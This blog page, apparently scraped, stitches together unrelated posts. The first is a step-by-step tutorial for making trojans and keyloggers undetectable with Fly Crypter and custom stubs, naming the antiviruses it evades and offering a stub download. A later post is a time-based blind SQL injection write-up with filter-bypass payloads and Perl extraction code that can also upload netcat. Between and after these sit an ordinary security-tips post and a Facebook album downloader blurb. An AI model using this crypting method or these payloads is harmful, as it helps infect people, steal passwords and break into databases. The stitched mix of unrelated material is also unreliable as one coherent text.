Pages

Monday, February 26, 2018

Create your own FUD trojan Stub

So, some crypters and viruses are now detected as hacktools by antiviruses and are of no use now. Bunn has created Fly Crypter which has unique stub generator. So, you can create your own stub and so your crypter becomes your own private version crypter because you can assign and use new stubs to viruses and thus helping your virus program to remain FUD.

How to make Virus undetectable:

Usually, Viruses are detected because their stubs are detected as viruses by AVs. So, if you change stub of viruses, most of times, they become undetectable to antiviruses. So, I am explaining you how to create your own stub and how to use this your self-created stub to make your virus FUD (Fully UnDetecatable) to antiviruses. This Crypter is tested by me and found working well on Windows XP and Windows Vista.

1. Free Download Fly Crypter + Unique Stub Generator software.


2. Run AUSG.exe file on your computer to see:
Make virus trojan FUD
Make virus trojan FUD

3. Select "Str. Encr." and "Stub Encryption" options as I have selected above. Now, hit on "Generate my Stub". Allow some time for AUSG.exe to generate stub for you. After sometime, you'll get a confirmation message.

4. Now, hit on "Compile my stub" and you'll again get message like this:
Compile stub
Compile stub

Note: If you get error messages over here, repeat from Step 2 using "Random Passwords length" value less than 5.

5. Now, move on to directory containing Fly Crypter and AUSG.exe file. You will now see around 4 or 5 random string newly created files. One of those files is your newly created FUD Stub. Let this be "XlbAtKQ.exe".

6. Now, open Fly Crypter.exe. Create Apocalypse server and simply drag and drop this server on Fly Crypter.



7. Right click on server.exe, select Main Options -> Custom Stub and new popup box will be displayed.
How to make your own stub
How to make your own stub

Now, browse to your newly created stub "XlbAtKQ.exe" and hit OK. Select any password level and hit OK.

8. Again Right Click -> Crypt files and enter the name and path where you wanna save the newly created crypted virus file.

9. Now, you have your crypted file ready to hack passwords and access pc remotely for you. Go to novirsthanks.org and scan your stub and crypted file. You will find the detection rate decreased significantly.

Note 1: For AUSG.exe to compile your stub, you should have Microsoft Visual basic 6 installed on your computer.

Note 2: If you aren't getting FUD stub, just select the antiviruses you wanna bypass. Now, create stubs and start scanning them at novirusthanks.org. This method is used to collect and group stubs undetectable by specific antiviruses. Here is one stub which is not detected by most famous AVs as today's scanner results indicate:
- Avira
- AVG
- Avast
- Bit Defender
- Kaspersky
- Quick Heal
- Panda

Free Download this Stub over
Password: techotips.blogspot.com

Update: This method is not working 100%. As some of the readers have reported this to be not working with many keyloggers like Ardamax keylogger, General keylogger and so. (Thanks George, Riya and Central2000 for your valuable feedback). So friends, try this out with your server whether if this works and please mention your feedback. If this is not working for you, try out crypter softwares.

Develop your own stubs. Now, all resides on you to make your trojans and viruses undetectable, since you are now able to develop your own stubs.

So friends, I hope this tutorial on how to make your own stubs to make your virus trojan undetectable by antiviruses will be helpful to you. If you have any problem in using Fly Crypter and AUSG.exe files to make your own stubs, please mention it in comments.

Enjoy and make your trojans undetectable...

8 Keys to Internet Security

Much more important thing is that which antivirus program you use (or anti-spyware, or firewall, or any security software), or even if you use one at all, are the practices that make up your online behavior. People who do risky stuff on the Internet will get a virus, sooner or later, regardless of how good their security software is. On the other hand, many security experts don’t use any antivirus software and still manage to avoid viruses.
I don’t recommend that you follow in the footsteps of the security experts – the nature of their calling demands a kind of paranoia that few of us can maintain. I recommend a solid package of security software (I run Cloud Antivirus and Windows Defender) but only as a safety net – something to pick up the slack when we make mistakes, not a first line of defense.
The thing with security, online or anywhere else, is that it’s always a trade-off between protection and convenience. I can tell you how to absolutely avoid any risk of computer virus, spyware, or trojan: stay offline and never install anything or use any removable storage media. That’s 100% perfect protection, but it would severely hinder your computer usage. It’s like securing a house: You could build a door-less, window-less titanium-sheathed reinforced-concrete bunker around your house and be absolutely sure burglars couldn’t get in, but you probably wouldn’t want to live there.
The tips below are sufficient to account for all but the most determined attacks against your computer. No amount of software or behavioral change can protect you from every possible attack (if the NSA wants to get on your PC, they are probably going to do so) but you can protect yourself from virtually all of the attacks you’re likely to face online.
I owe thanks for most of these tips to Leo Laporte and Steve Gibson, hosts of the TWiT netcast Security Now. If you’re interested in computer security at a very deep level, this weekly show is your ticket, and I heartily recommend it!

1. Use a router.

The very nature of the way routers works acts as an effective hardware firewall, preventing access to computers on your home network from outside the network. Put simply, when you request something from the Internet – say, you click a link, check your email, or enter a URL – the router notes which computer on its network the request came from so it can send the reply to the proper recipient. If a would be intruder attempts to enter your network, the router checks its list of outgoing requests and, if none is found correlating to the attackers’ IP address, it ignores it. It basically doesn’t know which computer to send it to, so it throws it out.
If you simply cannot use a hardware router, make sure your operating system’s firewall is turned on. This is almost, but not entirely, as good.

2. Do not open email attachments.

I know, who doesn’t want to see pictures of Anna Kournikova naked, right? Email attachments are a major vector for infecting computers, because it’s so easy to fake the sender so the email looks like it came from someone you know, and everybody loves opening attachments from people they know. It could be a funny picture of penguins, after all. But bottom line, don’t open attachments. If your email client automatically opens or previews them, turn that feature off. Even if it’s from your mom, and even if your mom says she opened it and it’s fine, still don’t open it. (By the way, next time you’re at mom’s, reinstall Windows. She’s got tons of viruses now.)
Now, I know that sometimes you have to open attachments, so here’s a simple test to know when it is most likely safe to open an attachment:
  1. You know that the email is from the person it says it’s from. That usually means that either they said they were sending it, or they’ve written a note that only they could have written.
  2. You are expecting an attachment from that person.
  3. You know the person who created the file.
  4. There is a compelling reason to open the attachment. I’m sorry, ma, but a good laugh isn’t enough to get me to risk my computer’s security.
If you can’t be absolutely, 100% sure on all these counts, trash it. 

3. Do not download bittorrent files.

That sucks, I know, but since you’re never absolutely sure where the file comes from, where it’s been, or who might have altered it, bittorrent is risky. Downloading a Linux distribution from Ubuntu is probably ok; downloading it from Pirate’s Bay is a bit dodgy. Downloading Oscar screeners of movies that haven’t been released yet is super-duper dodgy. It’s a real shame to have to forego sticking it to The Man because of practical concerns, but you’re taking a big risk downloading an unknown file from an unknown person about whom the only thing you know is that they don’t feel any compunctions about breaking the law. 

4. Do not download warez, porn, or other dubious files.

First they came for my bittorrents, then they came for my porn! It just gets worse and worse, doesn’t it. But really, think about it – people who distribute illegal copies of illegally hacked software a) are demonstrated lawbreakers, b) are familiar with programming code, and c) had access to the code you’re expecting to install on your computer. As for porn, while I’m sure there are plenty of Good Samaritans out there who distribute free pornography simply out of a desire for greater happiness in the world, some small number of them do it for financial gain. If they’re giving you free porn, they must be making money off you another way, and one of the easiest is to install a bunch of malware on your computer, run whatever code they want on it, and then sell the use of your computer to spammers, phishers, and other unsavory sorts. You want to know how bad these guys are? They don’t even care if they give pornography a bad name!

5. Do not download *anything* from sites you’re unfamiliar with.

Again, if you’re intending to install something you’ve downloaded onto your computer, you have to know that only people you trust have had access to it. Adobe, Microsoft, and other software manufacturers are generally trustworthy, as are sites like C|net’s Download.com. “Bob’s Free Software I Like a Whole Bunch” might not be quite as safe a bet.

6. Turn off Flash, Javascript, and other browser plugins.

Flash ads have been used to install viruses. So has Javascript code. You don’t have to do anything to get infected this way; you just visit a site with the malicious code on it and *bam*, you’re infected. Because of that, hardcore security folks turn off Javascript and either block or never install Flash. Personally, I think it limits the usefulness of the Internet too much; I’ve decided to risk running Javascript, and use the FlashBlock plugin in Firefox so I can select which Flash objects on a page I want to run (allowing me, for instance, to watch YouTube videos while preventing Flash ads on the same page from loading).

7. Do not click links in email.

It’s very easy to hide the real destination of links sent in email by using HTML where the text reads “www.perfectlysafesiteyouknowandtrust.com” but the actual URL is “www.reallybadsiterunbymeanpeoplewithnofriends.net”. This is how phishing scams work – you think you’re going to PayPal or your bank, but really you’re going to a page designed to look just like your bank’s login page but hosted on the mean people’s server. Also, bad guys often put unique tracking IDs into links, so that they know exactly who clicked on a link – which means that they know which email addresses out of the millions they sent spam to are valid, which makes them worth more money to other spammers. Um, yay?

7a. Do not click shortened URLs.

I don’t like this one, because I like Twitter and you lose a lot of functionality if you don’t use a service like bit.ly or is.gd to shorten URLs, but these links are scary. When you hover your mouse over a link, the URL appears in the email or browser’s status bar, meaning you can verify that the link heads to where it says it does. When you do the same with a shortened URL, it just says the shortened URL. There are Firefox extensions like UnTiny that will reveal the true destination of shortened URLs, and some Twitter clients do as well, but until a universal solution is standardized, these URLs remain a bit scary, security-wise.

8. Install all security updates.

Unless you’re a multi-national mega-corporation running oodles of mission-critical custom-designed software, you need to install security updates as quickly as possible upon release. If remembering to do this isn’t something you think you’d be likely to do, set your computer to automatically download and install updates. Increasingly, we’re seeing “0-day” exploits – viruses and trojans written to make use of security flaws before those flaws are corrected by – or, in some cases, even known to – manufacturers. Keeping up-to-date is essential to keep even marginally safe.
I know that, the world being what it is, someone will be thinking right about now, “Hey, why don’t you just switch to Mac OS X or Linux?” It’s true, those operating systems get far fewer viruses and other problems than Windows PCs, but most experts seem to agree that this is at least in part because there are so many Windows PCs and so few Mac and Linux PCs. (There are plenty of Linux servers, but those are under professional supervision, which goes a long way towards making up for any security weaknesses Linux has.) Bad guys program for the system that allows the greatest spread of their malware, and right now, that’s Windows.
But if you’re still not convinced, I’ve got an even better idea for you. Both Mac OS X and Linux have demonstrated security vulnerabilities, and as they become more common are likely to become targets for hackers. So they’re not really safe bets. Instead, try BeOS! It may be riddled with security holes and only run on Pentium 4 and earlier PCs, but I can guarantee you, nobody is writing viruses for it!
For everyone else, whether you use Windows, Mac, or Linux, make sure to follow the rules above and, chances are, you’ll be just fine.

Time Based Blind SQL Injection

Bug Hunting:

When I put the famous single quote in front of the form I got the well known message:

Microsoft OLE DB Provider for SQL Server
error '80040e14'
Unclosed quotation mark before the character string '''.
Then, without any extra parsing to above error response, I started inserting the common ways of exploitation:
  • '+OR+'1'='1
  • '+OR+1=1--
  • '+having+1=1--
  • '+union (select 1 from table)--
  • etc
The first thing I noticed is that the spaces were being filtered but as explained in my previous SQLi post, you can easily bypass that by injecting a TAB (%09) instead of a space.

After bypassing the space restriction, I always got syntax errors like:

Incorrect syntax near the keyword 'OR'.

Incorrect syntax near the keyword 'having'.

Incorrect syntax near the keyword 'union'.
Which was telling me two things: first, my SQLi was being executed but with syntax errors and second that I was not in the common scenario where the injection is being placed after the WHERE clause:

select ..... where user='aa' OR 1=1
After a lot of testing without success, I just assumed I cannot inject any SQL command after the single quote, so, then I started inserting other chars like: ',' and... I got below error:

Procedure or function get_Etiqueta has too many arguments specified.
Then I realized we were dealing with a Stored Procedure which in fact was injectable, this could explain the restrictions and therefore the syntax error messages. Then I decide a new way of injection (below is the value inserted in the vulnerable POST parameter):

';<my_own_sql_query>;--
Above injection is saying, complete the current request, execute my own SQL command, and comment out the rest of the string.

When executed using fake table and field:

'; select xxx from table tabla'--
I did not get any error, just redirected back to main Login page. Then I realized we were not getting any responses from the DB and therefore in a Blind SQL Injection scenario, so I decided to use the famous WAITEFOR DELAY command from MSSQL to validate if my attempts were being executed in the server side, so I sent:

0';WAITFOR%09DELAY%09'0:0:15'
And voila!!! The browser waits 15 seconds to get the response from the Server!! Now we have identified the BUG, so, how can we exploit it? Let's go to the next section.

Exploit from Scratch.

I decided to use sqlmap or sqlninja to dump the database or to get a remote shell, but none works for me, just for one reason, those tools have their own methods to bypass filters, but unfortunately, the TAB (%09) trick is not handled by them and therefore all my injections were being rejected. It was a mess to adjust their tools so I decided to keep improving my own tools and come up with Regalado-blindSQL.pl perl script.

The main features of the tool are as follows:
  • Create a SQL procedure to assign the SQL query result to a variable.
  • The tool, iterates to each char from the result and compare it with the ASCII table to identify its value, if the value is found, the response will be delay by 10 seconds, this way the tool can identify if a char was identified.
  • Write output to a log file.
  • Implements netcat upload feature from Sqlninja tool, just changing the bypass technique and the Libraries used to established the SSL Connection.
Below the script to identify the chars in the response:

1. my $cmd = " declare \@s varchar(100) select TOP 1 \@s = $sql" .
2. " if (ascii(substring(\@s,$j,1))) =". $i ." waitfor delay '0:0:10' " .
3. " else waitfor delay '0:0:1'";

At Line 1, we create the variable @s and assign it the result of the $sql being executed.
At Line 2, the first char (denoted by $j) is subtracted from the string acquired and compare with the first value in the ASCII Table ($i).
This loops will repeat until the char is found and then $j will be incremented to move to the next char in the string.

The main loop to get the string, parse each char and compare it with ASCII TABLE is here:

while (length ($dato) > 0){ #Keep searching until no more data found
$dato ="";
for $j (1 .. 100){#This is the maximum text length to retrieve, although the tool knows when the string is complete
print "\t\nIdentificando char number: $j\n";
open (FILE,">>", "output.txt") or die $!; #Creating log file
for $i (32 .. 126){ #ASCII TABLE Printable chars only
$g = $i;
print "\t\nValidating if the letter exist: " . chr($i) . "\n";
my $cmd = " declare \@s varchar(100) select TOP 1 \@s = $sql" .
" if (ascii(substring(\@s,$j,1))) =". $i ." waitfor delay '0:0:10' " .
" else waitfor delay '0:0:1'";

send_request($prefix . $cmd . $postfix); #Send HTTPS request
if (check_time() eq "encontrado") { #validates the response to know if the car was detected.
last;
}
}

if ($r eq "encontrado"){
print "\t\nGetting Contenido ... " . $dato . "\n";
print FILE "Getting Contenido ...: " . $dato . "\n";
close(FILE);
}
else{ #No encontro ningun caracter y esto puede significr el fin de la palabra identificada

print "\t\n*********END OF CONTENT EXTRACTTION ... Moving to next one.\n";
last;
}
}
print "\t\n****************Content FOUND: " . $dato . " for table/field: $tb/$fi******************\n";
print FILE "\n****************Content FOUND: " . $dato . " for table/field: $tb/$fi****************\n";

$sql = $sql . " and $fi not like '". $dato . "'"; #preparing the next string to retrieve.
}
print "\t\nEND OF EXECUTION check output.txt log file.\n\n";

Finally, the tools is able to identify:
  • DB Name
  • DB User
  • DB Version
  • List of tables from current DB
  • List of fields from specific table
  • Content of tables
  • Upload netcat via sqlninja methods.
IMPORTANT: The tool DOES NOT FIND vulnerabilities, it assumes you already found one and need to leverage the exploitation. Being this said, you might need to change the $prefix and $postfix variables within the tool to adjust based on the way your application is exploitable.


Download All Photos, Images Inside Facebook Albums Easily in Firefox

FacePAD (Facebook Photo Album Downloader) allows you to download entire Facebook albums with a click of a button. FacePAD, better known as the Facebook Photo Album Downloader will allow you to download your friends’ entire Facebook albums with a click of a button. FacePAD is also compatible with all languages that are compatible with Facebook.

SETUP/PREFERENCES
1) Make sure that THIRD PARTY COOKIES are ENABLED in Firefox’s Options/Preferences (under the Privacy tab).

DOWNLOADS ALBUMS (FRIEND’S, FAN PAGE)
(1) To download photos from a friend’s/fan page album, right-click (with your mouse) on the name/link of the Facebook album of interest and click the DOWNLOAD ALBUM WITH FACEPAD option.
(2) A window will pop-up asking you to choose a directory/folder where you would like the photos to be stored.
(3) The photos will then be downloaded and renamed in sequential, ascending order, where the order is determined by the age of the photo.

DOWNLOADS ALBUMS (GROUP, EVENT)
(1)To download photos from the group/event album, click on the photo tab in said group/event. At the top, where it says SEE ALL PHOTOS, right-click (with your mouse) on this link and click DOWNLOAD ALBUM WITH FACEPAD option.
(2) A window will pop-up asking you to choose a directory/folder where you would like the photos to be stored.
(3) The photos will then be downloaded and renamed in sequential, ascending order, where the order is determined by the age of the photo.

Related Posts Plugin for WordPress, Blogger...